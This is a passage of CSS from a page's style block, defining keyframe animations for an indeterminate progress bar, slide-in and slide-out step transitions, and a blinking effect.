    animation-timing-function: cubic-bezier(0.334731, 0.12482, 0.785844, 1);
    transform: scaleX(0.08);
  }

  69.15% {
    animation-timing-function: cubic-bezier(0.06, 0.11, 0.6, 1);
    transform: scaleX(0.661479);
  }

  100% {
    transform: scaleX(0.08);
  }
}

@keyframes auxiliary-indeterminate-scale {
  0% {
    animation-timing-function: cubic-bezier(
      0.205028,
      0.057051,
      0.57661,
      0.453971
    );
    transform: scaleX(0.08);
  }

  19.15% {
    animation-timing-function: cubic-bezier(
      0.152313,
      0.196432,
      0.648374,
      1.004315
    );
    transform: scaleX(0.457104);
  }

  44.15% {
    animation-timing-function: cubic-bezier(
      0.257759,
      0.003163,
      0.211762,
      1.38179
    );
    transform: scaleX(0.72796);
  }

  100% {
    transform: scaleX(0.08);
  }
}

.step {
  animation: slide-in-right 0.5s cubic-bezier(0.25, 0.46, 0.45, 0.94) both;
}

.step1 {
  animation: slide-out-left 0.5s cubic-bezier(0.55, 0.085, 0.68, 0.53) both;
}

@keyframes slide-in-right {
  0% {
    -webkit-transform: translateX(1000px);
    transform: translateX(1000px);
    opacity: 0;
  }

  100% {
    -webkit-transform: translateX(0);
    transform: translateX(0);
    opacity: 1;
  }
}

@keyframes slide-out-left {
  0% {
    -webkit-transform: translateX(0);
    transform: translateX(0);
    opacity: 1;
  }

  100% {
    -webkit-transform: translateX(-1000px);
    transform: translateX(-1000px);
    opacity: 0;
  }
}

@keyframes blink {
  0%,
  100% {
    opacity: 1;
  }

  50% {
    opacity: 0;
  }
}
</style>
